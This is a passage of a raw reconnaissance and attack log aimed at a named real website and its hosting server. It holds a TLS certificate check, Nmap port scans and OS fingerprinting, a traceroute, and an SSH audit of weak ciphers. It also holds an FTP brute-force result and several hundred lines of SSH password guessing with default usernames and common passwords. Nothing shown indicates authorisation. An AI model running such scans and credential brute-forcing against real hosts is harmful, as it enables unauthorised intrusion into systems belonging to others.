  1171. Accepted TLSv1.0 256 bits AES256-SHA
  1172.  
  1173. SSL Certificate:
  1174. Signature Algorithm: sha256WithRSAEncryption
  1175. RSA Key Strength: 2048
  1176.  
  1177. Subject: hizb-ut-tahrir.dk
  1178. Altnames: DNS:hizb-ut-tahrir.dk, DNS:www.hizb-ut-tahrir.dk
  1179. Issuer: Let's Encrypt Authority X3
  1180.  
  1181. Not valid before: Dec 24 03:46:41 2018 GMT
  1182. Not valid after: Mar 24 03:46:41 2019 GMT
  1183. #######################################################################################################################################
  1184. Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 21:45 EST
  1185. Nmap scan report for linux260.unoeuro.com (93.191.156.145)
  1186. Host is up (0.13s latency).
  1187. Not shown: 447 filtered ports, 24 closed ports
  1188. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  1189. PORT STATE SERVICE
  1190. 21/tcp open ftp
  1191. 22/tcp open ssh
  1192. 80/tcp open http
  1193. 443/tcp open https
  1194. 8008/tcp open http
  1195. #######################################################################################################################################
  1196. Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 21:45 EST
  1197. Nmap scan report for linux260.unoeuro.com (93.191.156.145)
  1198. Host is up (0.027s latency).
  1199. Not shown: 2 filtered ports
  1200. PORT STATE SERVICE
  1201. 53/udp open|filtered domain
  1202. 67/udp open|filtered dhcps
  1203. 68/udp open|filtered dhcpc
  1204. 69/udp open|filtered tftp
  1205. 88/udp open|filtered kerberos-sec
  1206. 123/udp open|filtered ntp
  1207. 139/udp open|filtered netbios-ssn
  1208. 161/udp open|filtered snmp
  1209. 162/udp open|filtered snmptrap
  1210. 389/udp open|filtered ldap
  1211. 520/udp open|filtered route
  1212. 2049/udp open|filtered nfs
  1213. #######################################################################################################################################
  1214. Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 21:45 EST
  1215. Nmap scan report for linux260.unoeuro.com (93.191.156.145)
  1216. Host is up (0.13s latency).
  1217.  
  1218. PORT STATE SERVICE VERSION
  1219. 21/tcp open ftp ProFTPD
  1220. | ftp-brute:
  1221. | Accounts: No valid accounts found
  1222. |_ Statistics: Performed 4979 guesses in 180 seconds, average tps: 27.0
  1223. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1224. Device type: general purpose|firewall|storage-misc|VoIP phone
  1225. Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
  1226. OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
  1227. Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 or 3.10 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
  1228. No exact OS matches for host (test conditions non-ideal).
  1229. Network Distance: 19 hops
  1230.  
  1231. TRACEROUTE (using port 21/tcp)
  1232. HOP RTT ADDRESS
  1233. 1 22.86 ms 10.246.200.1
  1234. 2 23.20 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
  1235. 3 24.38 ms 37.120.128.166
  1236. 4 23.20 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
  1237. 5 23.18 ms ix-xe-11-1-1-0.tcore1.w6c-montreal.as6453.net (66.198.96.98)
  1238. 6 121.71 ms if-ae-12-2.tcore1.mtt-montreal.as6453.net (64.86.31.26)
  1239. 7 120.23 ms if-ae-0-2.tcore2.mtt-montreal.as6453.net (216.6.115.90)
  1240. 8 116.02 ms if-ae-5-2.tcore2.n0v-new-york.as6453.net (64.86.226.58)
  1241. 9 122.00 ms if-ae-4-2.tcore2.l78-london.as6453.net (80.231.131.157)
  1242. 10 121.49 ms if-ae-2-2.tcore1.l78-london.as6453.net (80.231.131.2)
  1243. 11 115.37 ms if-ae-3-2.tcore1.pye-paris.as6453.net (80.231.154.142)
  1244. 12 122.72 ms if-ae-11-2.tcore1.pvu-paris.as6453.net (80.231.153.49)
  1245. 13 116.46 ms 195.219.87.13
  1246. 14 114.22 ms 195.219.87.25
  1247. 15 128.74 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
  1248. 16 133.41 ms 195.41.183.146
  1249. 17 135.56 ms 212.237.248.5
  1250. 18 ...
  1251. 19 138.30 ms linux260.unoeuro.com (93.191.156.145)
  1252. #######################################################################################################################################
  1253. # general
  1254. (gen) banner: SSH-2.0-OpenSSH_5.3
  1255. (gen) software: OpenSSH 5.3
  1256. (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
  1257. (gen) compression: enabled (zlib@openssh.com)
  1258.  
  1259. # key exchange algorithms
  1260. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
  1261. `- [info] available since OpenSSH 4.4
  1262. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1263. `- [warn] using weak hashing algorithm
  1264. `- [info] available since OpenSSH 2.3.0
  1265. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
  1266. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
  1267. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1268. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
  1269. `- [warn] using small 1024-bit modulus
  1270. `- [warn] using weak hashing algorithm
  1271. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  1272.  
  1273. # host-key algorithms
  1274. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
  1275. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
  1276. `- [warn] using small 1024-bit modulus
  1277. `- [warn] using weak random number generator could reveal the key
  1278. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  1279.  
  1280. # encryption algorithms (ciphers)
  1281. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  1282. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
  1283. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  1284. (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1285. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1286. `- [warn] using weak cipher
  1287. `- [info] available since OpenSSH 4.2
  1288. (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1289. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1290. `- [warn] using weak cipher
  1291. `- [info] available since OpenSSH 4.2
  1292. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1293. `- [warn] using weak cipher mode
  1294. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  1295. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1296. `- [warn] using weak cipher
  1297. `- [warn] using weak cipher mode
  1298. `- [warn] using small 64-bit block size
  1299. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  1300. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1301. `- [fail] disabled since Dropbear SSH 0.53
  1302. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1303. `- [warn] using weak cipher mode
  1304. `- [warn] using small 64-bit block size
  1305. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  1306. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1307. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1308. `- [warn] using weak cipher mode
  1309. `- [warn] using small 64-bit block size
  1310. `- [info] available since OpenSSH 2.1.0
  1311. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1312. `- [warn] using weak cipher mode
  1313. `- [info] available since OpenSSH 2.3.0
  1314. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1315. `- [warn] using weak cipher mode
  1316. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
  1317. (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1318. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1319. `- [warn] using weak cipher
  1320. `- [info] available since OpenSSH 2.1.0
  1321. (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1322. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1323. `- [warn] using weak cipher mode
  1324. `- [info] available since OpenSSH 2.3.0
  1325.  
  1326. # message authentication code algorithms
  1327. (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1328. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1329. `- [warn] using encrypt-and-MAC mode
  1330. `- [warn] using weak hashing algorithm
  1331. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  1332. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
  1333. `- [warn] using weak hashing algorithm
  1334. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  1335. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
  1336. `- [warn] using small 64-bit tag size
  1337. `- [info] available since OpenSSH 4.7
  1338. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
  1339. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  1340. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
  1341. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  1342. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1343. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1344. `- [warn] using encrypt-and-MAC mode
  1345. `- [info] available since OpenSSH 2.5.0
  1346. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1347. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1348. `- [warn] using encrypt-and-MAC mode
  1349. `- [info] available since OpenSSH 2.1.0
  1350. (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1351. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1352. `- [warn] using encrypt-and-MAC mode
  1353. `- [warn] using weak hashing algorithm
  1354. `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
  1355. (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1356. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1357. `- [warn] using encrypt-and-MAC mode
  1358. `- [warn] using weak hashing algorithm
  1359. `- [info] available since OpenSSH 2.5.0
  1360.  
  1361. # algorithm recommendations (for OpenSSH 5.3)
  1362. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
  1363. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
  1364. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
  1365. (rec) -ssh-dss -- key algorithm to remove
  1366. (rec) -arcfour -- enc algorithm to remove
  1367. (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
  1368. (rec) -blowfish-cbc -- enc algorithm to remove
  1369. (rec) -3des-cbc -- enc algorithm to remove
  1370. (rec) -aes256-cbc -- enc algorithm to remove
  1371. (rec) -arcfour256 -- enc algorithm to remove
  1372. (rec) -cast128-cbc -- enc algorithm to remove
  1373. (rec) -aes192-cbc -- enc algorithm to remove
  1374. (rec) -arcfour128 -- enc algorithm to remove
  1375. (rec) -aes128-cbc -- enc algorithm to remove
  1376. (rec) -hmac-md5-96 -- mac algorithm to remove
  1377. (rec) -hmac-ripemd160 -- mac algorithm to remove
  1378. (rec) -hmac-sha1-96 -- mac algorithm to remove
  1379. (rec) -umac-64@openssh.com -- mac algorithm to remove
  1380. (rec) -hmac-md5 -- mac algorithm to remove
  1381. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
  1382. (rec) -hmac-sha1 -- mac algorithm to remove
  1383. #######################################################################################################################################
  1384. Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 21:50 EST
  1385. NSE: [ssh-run] Failed to specify credentials and command to run.
  1386. NSE: [ssh-brute] Trying username/password pair: root:root
  1387. NSE: [ssh-brute] Trying username/password pair: admin:admin
  1388. NSE: [ssh-brute] Trying username/password pair: administrator:administrator
  1389. NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
  1390. NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
  1391. NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
  1392. NSE: [ssh-brute] Trying username/password pair: guest:guest
  1393. NSE: [ssh-brute] Trying username/password pair: user:user
  1394. NSE: [ssh-brute] Trying username/password pair: web:web
  1395. NSE: [ssh-brute] Trying username/password pair: test:test
  1396. NSE: [ssh-brute] Trying username/password pair: root:
  1397. NSE: [ssh-brute] Trying username/password pair: admin:
  1398. NSE: [ssh-brute] Trying username/password pair: administrator:
  1399. NSE: [ssh-brute] Trying username/password pair: webadmin:
  1400. NSE: [ssh-brute] Trying username/password pair: sysadmin:
  1401. NSE: [ssh-brute] Trying username/password pair: netadmin:
  1402. NSE: [ssh-brute] Trying username/password pair: guest:
  1403. NSE: [ssh-brute] Trying username/password pair: user:
  1404. NSE: [ssh-brute] Trying username/password pair: web:
  1405. NSE: [ssh-brute] Trying username/password pair: test:
  1406. NSE: [ssh-brute] Trying username/password pair: root:123456
  1407. NSE: [ssh-brute] Trying username/password pair: admin:123456
  1408. NSE: [ssh-brute] Trying username/password pair: administrator:123456
  1409. NSE: [ssh-brute] Trying username/password pair: webadmin:123456
  1410. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
  1411. NSE: [ssh-brute] Trying username/password pair: netadmin:123456
  1412. NSE: [ssh-brute] Trying username/password pair: guest:123456
  1413. NSE: [ssh-brute] Trying username/password pair: user:123456
  1414. NSE: [ssh-brute] Trying username/password pair: web:123456
  1415. NSE: [ssh-brute] Trying username/password pair: test:123456
  1416. NSE: [ssh-brute] Trying username/password pair: root:12345
  1417. NSE: [ssh-brute] Trying username/password pair: admin:12345
  1418. NSE: [ssh-brute] Trying username/password pair: administrator:12345
  1419. NSE: [ssh-brute] Trying username/password pair: webadmin:12345
  1420. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
  1421. NSE: [ssh-brute] Trying username/password pair: netadmin:12345
  1422. NSE: [ssh-brute] Trying username/password pair: guest:12345
  1423. NSE: [ssh-brute] Trying username/password pair: user:12345
  1424. NSE: [ssh-brute] Trying username/password pair: web:12345
  1425. NSE: [ssh-brute] Trying username/password pair: test:12345
  1426. NSE: [ssh-brute] Trying username/password pair: root:123456789
  1427. NSE: [ssh-brute] Trying username/password pair: admin:123456789
  1428. NSE: [ssh-brute] Trying username/password pair: administrator:123456789
  1429. NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
  1430. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
  1431. NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
  1432. NSE: [ssh-brute] Trying username/password pair: guest:123456789
  1433. NSE: [ssh-brute] Trying username/password pair: user:123456789
  1434. NSE: [ssh-brute] Trying username/password pair: web:123456789
  1435. NSE: [ssh-brute] Trying username/password pair: test:123456789
  1436. NSE: [ssh-brute] Trying username/password pair: root:password
  1437. NSE: [ssh-brute] Trying username/password pair: admin:password
  1438. NSE: [ssh-brute] Trying username/password pair: administrator:password
  1439. NSE: [ssh-brute] Trying username/password pair: webadmin:password
  1440. NSE: [ssh-brute] Trying username/password pair: sysadmin:password
  1441. NSE: [ssh-brute] Trying username/password pair: netadmin:password
  1442. NSE: [ssh-brute] Trying username/password pair: guest:password
  1443. NSE: [ssh-brute] Trying username/password pair: user:password
  1444. NSE: [ssh-brute] Trying username/password pair: web:password
  1445. NSE: [ssh-brute] Trying username/password pair: test:password
  1446. NSE: [ssh-brute] Trying username/password pair: root:iloveyou
  1447. NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
  1448. NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
  1449. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
  1450. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
  1451. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
  1452. NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
  1453. NSE: [ssh-brute] Trying username/password pair: user:iloveyou
  1454. NSE: [ssh-brute] Trying username/password pair: web:iloveyou
  1455. NSE: [ssh-brute] Trying username/password pair: test:iloveyou
  1456. NSE: [ssh-brute] Trying username/password pair: root:princess
  1457. NSE: [ssh-brute] Trying username/password pair: admin:princess
  1458. NSE: [ssh-brute] Trying username/password pair: administrator:princess
  1459. NSE: [ssh-brute] Trying username/password pair: webadmin:princess
  1460. NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
  1461. NSE: [ssh-brute] Trying username/password pair: netadmin:princess
  1462. NSE: [ssh-brute] Trying username/password pair: guest:princess
  1463. NSE: [ssh-brute] Trying username/password pair: user:princess
  1464. NSE: [ssh-brute] Trying username/password pair: web:princess
  1465. NSE: [ssh-brute] Trying username/password pair: test:princess
  1466. NSE: [ssh-brute] Trying username/password pair: root:12345678
  1467. NSE: [ssh-brute] Trying username/password pair: admin:12345678
  1468. NSE: [ssh-brute] Trying username/password pair: administrator:12345678
  1469. NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
  1470. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
  1471. NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
  1472. NSE: [ssh-brute] Trying username/password pair: guest:12345678
  1473. NSE: [ssh-brute] Trying username/password pair: user:12345678
  1474. NSE: [ssh-brute] Trying username/password pair: web:12345678
  1475. NSE: [ssh-brute] Trying username/password pair: test:12345678
  1476. NSE: [ssh-brute] Trying username/password pair: root:1234567
  1477. NSE: [ssh-brute] Trying username/password pair: admin:1234567
  1478. NSE: [ssh-brute] Trying username/password pair: administrator:1234567
  1479. NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
  1480. NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
  1481. NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
  1482. NSE: [ssh-brute] Trying username/password pair: guest:1234567
  1483. NSE: [ssh-brute] Trying username/password pair: user:1234567
  1484. NSE: [ssh-brute] Trying username/password pair: web:1234567
  1485. NSE: [ssh-brute] Trying username/password pair: test:1234567
  1486. NSE: [ssh-brute] Trying username/password pair: root:abc123
  1487. NSE: [ssh-brute] Trying username/password pair: admin:abc123
  1488. NSE: [ssh-brute] Trying username/password pair: administrator:abc123
  1489. NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
  1490. NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
  1491. NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
  1492. NSE: [ssh-brute] Trying username/password pair: guest:abc123
  1493. NSE: [ssh-brute] Trying username/password pair: user:abc123
  1494. NSE: [ssh-brute] Trying username/password pair: web:abc123
  1495. NSE: [ssh-brute] Trying username/password pair: test:abc123
  1496. NSE: [ssh-brute] Trying username/password pair: root:nicole
  1497. NSE: [ssh-brute] Trying username/password pair: admin:nicole
  1498. NSE: [ssh-brute] Trying username/password pair: administrator:nicole
  1499. NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
  1500. NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
  1501. NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
  1502. NSE: [ssh-brute] Trying username/password pair: guest:nicole
  1503. NSE: [ssh-brute] Trying username/password pair: user:nicole
  1504. NSE: [ssh-brute] Trying username/password pair: web:nicole
  1505. NSE: [ssh-brute] Trying username/password pair: test:nicole
  1506. NSE: [ssh-brute] Trying username/password pair: root:daniel
  1507. NSE: [ssh-brute] Trying username/password pair: admin:daniel
  1508. NSE: [ssh-brute] Trying username/password pair: administrator:daniel
  1509. NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
  1510. NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
  1511. NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
  1512. NSE: [ssh-brute] Trying username/password pair: guest:daniel
  1513. NSE: [ssh-brute] Trying username/password pair: user:daniel
  1514. NSE: [ssh-brute] Trying username/password pair: web:daniel
  1515. NSE: [ssh-brute] Trying username/password pair: test:daniel
  1516. NSE: [ssh-brute] Trying username/password pair: root:monkey
  1517. NSE: [ssh-brute] Trying username/password pair: admin:monkey
  1518. NSE: [ssh-brute] Trying username/password pair: administrator:monkey
  1519. NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
  1520. NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
  1521. NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
  1522. NSE: [ssh-brute] Trying username/password pair: guest:monkey
  1523. NSE: [ssh-brute] Trying username/password pair: user:monkey
  1524. NSE: [ssh-brute] Trying username/password pair: web:monkey
  1525. NSE: [ssh-brute] Trying username/password pair: test:monkey
  1526. NSE: [ssh-brute] Trying username/password pair: root:babygirl
  1527. NSE: [ssh-brute] Trying username/password pair: admin:babygirl
  1528. NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
  1529. NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
  1530. NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
  1531. NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
  1532. NSE: [ssh-brute] Trying username/password pair: guest:babygirl
  1533. NSE: [ssh-brute] Trying username/password pair: user:babygirl
  1534. NSE: [ssh-brute] Trying username/password pair: web:babygirl
  1535. NSE: [ssh-brute] Trying username/password pair: test:babygirl
  1536. NSE: [ssh-brute] Trying username/password pair: root:qwerty
  1537. NSE: [ssh-brute] Trying username/password pair: admin:qwerty
  1538. NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
  1539. NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
  1540. NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
  1541. NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
  1542. NSE: [ssh-brute] Trying username/password pair: guest:qwerty
  1543. NSE: [ssh-brute] Trying username/password pair: user:qwerty
  1544. NSE: [ssh-brute] Trying username/password pair: web:qwerty
  1545. NSE: [ssh-brute] Trying username/password pair: test:qwerty
  1546. NSE: [ssh-brute] Trying username/password pair: root:lovely
  1547. NSE: [ssh-brute] Trying username/password pair: admin:lovely
  1548. NSE: [ssh-brute] Trying username/password pair: administrator:lovely
  1549. NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
  1550. NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
  1551. NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
  1552. NSE: [ssh-brute] Trying username/password pair: guest:lovely
  1553. NSE: [ssh-brute] Trying username/password pair: user:lovely
  1554. NSE: [ssh-brute] Trying username/password pair: web:lovely
  1555. NSE: [ssh-brute] Trying username/password pair: test:lovely
  1556. NSE: [ssh-brute] Trying username/password pair: root:654321
  1557. NSE: [ssh-brute] Trying username/password pair: admin:654321
  1558. NSE: [ssh-brute] Trying username/password pair: administrator:654321
  1559. NSE: [ssh-brute] Trying username/password pair: webadmin:654321
  1560. NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
  1561. NSE: [ssh-brute] Trying username/password pair: netadmin:654321
  1562. NSE: [ssh-brute] Trying username/password pair: guest:654321
  1563. NSE: [ssh-brute] Trying username/password pair: user:654321
  1564. NSE: [ssh-brute] Trying username/password pair: web:654321
  1565. NSE: [ssh-brute] Trying username/password pair: test:654321
  1566. NSE: [ssh-brute] Trying username/password pair: root:michael
  1567. NSE: [ssh-brute] Trying username/password pair: admin:michael
  1568. NSE: [ssh-brute] Trying username/password pair: administrator:michael
  1569. NSE: [ssh-brute] Trying username/password pair: webadmin:michael
  1570. NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
  1571. NSE: [ssh-brute] Trying username/password pair: netadmin:michael
  1572. NSE: [ssh-brute] Trying username/password pair: guest:michael
  1573. NSE: [ssh-brute] Trying username/password pair: user:michael
  1574. NSE: [ssh-brute] Trying username/password pair: web:michael
  1575. NSE: [ssh-brute] Trying username/password pair: test:michael
  1576. NSE: [ssh-brute] Trying username/password pair: root:jessica
  1577. NSE: [ssh-brute] Trying username/password pair: admin:jessica
  1578. NSE: [ssh-brute] Trying username/password pair: administrator:jessica
  1579. NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
  1580. NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
  1581. NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
  1582. NSE: [ssh-brute] Trying username/password pair: guest:jessica
  1583. NSE: [ssh-brute] Trying username/password pair: user:jessica
  1584. NSE: [ssh-brute] Trying username/password pair: web:jessica
  1585. NSE: [ssh-brute] Trying username/password pair: test:jessica
  1586. NSE: [ssh-brute] Trying username/password pair: root:111111
  1587. NSE: [ssh-brute] Trying username/password pair: admin:111111
  1588. NSE: [ssh-brute] Trying username/password pair: administrator:111111
  1589. NSE: [ssh-brute] Trying username/password pair: webadmin:111111
  1590. NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
  1591. NSE: [ssh-brute] Trying username/password pair: netadmin:111111
  1592. NSE: [ssh-brute] Trying username/password pair: guest:111111
  1593. NSE: [ssh-brute] Trying username/password pair: user:111111
  1594. NSE: [ssh-brute] Trying username/password pair: web:111111
  1595. NSE: [ssh-brute] Trying username/password pair: test:111111
  1596. NSE: [ssh-brute] Trying username/password pair: root:ashley
  1597. NSE: [ssh-brute] Trying username/password pair: admin:ashley
  1598. NSE: [ssh-brute] Trying username/password pair: administrator:ashley
  1599. NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
  1600. NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
  1601. NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
  1602. NSE: [ssh-brute] Trying username/password pair: guest:ashley
  1603. NSE: [ssh-brute] Trying username/password pair: user:ashley
  1604. NSE: [ssh-brute] Trying username/password pair: web:ashley
  1605. NSE: [ssh-brute] Trying username/password pair: test:ashley
  1606. NSE: [ssh-brute] Trying username/password pair: root:000000
  1607. NSE: [ssh-brute] Trying username/password pair: admin:000000
  1608. NSE: [ssh-brute] Trying username/password pair: administrator:000000
  1609. NSE: [ssh-brute] Trying username/password pair: webadmin:000000
  1610. NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
  1611. NSE: [ssh-brute] Trying username/password pair: netadmin:000000
  1612. NSE: [ssh-brute] Trying username/password pair: guest:000000
  1613. NSE: [ssh-brute] Trying username/password pair: user:000000
  1614. NSE: [ssh-brute] Trying username/password pair: web:000000
  1615. NSE: [ssh-brute] Trying username/password pair: test:000000
  1616. NSE: [ssh-brute] Trying username/password pair: root:iloveu
  1617. NSE: [ssh-brute] Trying username/password pair: admin:iloveu
  1618. NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
  1619. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
  1620. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
  1621. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
  1622. NSE: [ssh-brute] Trying username/password pair: guest:iloveu
  1623. NSE: [ssh-brute] Trying username/password pair: user:iloveu
  1624. NSE: [ssh-brute] Trying username/password pair: web:iloveu
  1625. NSE: [ssh-brute] Trying username/password pair: test:iloveu
  1626. NSE: [ssh-brute] Trying username/password pair: root:michelle
  1627. NSE: [ssh-brute] Trying username/password pair: admin:michelle
  1628. NSE: [ssh-brute] Trying username/password pair: administrator:michelle
  1629. NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
  1630. NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
  1631. NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
  1632. NSE: [ssh-brute] Trying username/password pair: guest:michelle
  1633. NSE: [ssh-brute] Trying username/password pair: user:michelle
  1634. NSE: [ssh-brute] Trying username/password pair: web:michelle
  1635. NSE: [ssh-brute] Trying username/password pair: test:michelle
  1636. NSE: [ssh-brute] Trying username/password pair: root:tigger
  1637. NSE: [ssh-brute] Trying username/password pair: admin:tigger
  1638. NSE: [ssh-brute] Trying username/password pair: administrator:tigger
  1639. NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
  1640. NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
  1641. NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
  1642. NSE: [ssh-brute] Trying username/password pair: guest:tigger
  1643. NSE: [ssh-brute] Trying username/password pair: user:tigger
  1644. NSE: [ssh-brute] Trying username/password pair: web:tigger
  1645. NSE: [ssh-brute] Trying username/password pair: test:tigger
  1646. NSE: [ssh-brute] Trying username/password pair: root:sunshine
  1647. NSE: [ssh-brute] Trying username/password pair: admin:sunshine
  1648. NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
  1649. NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
  1650. NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
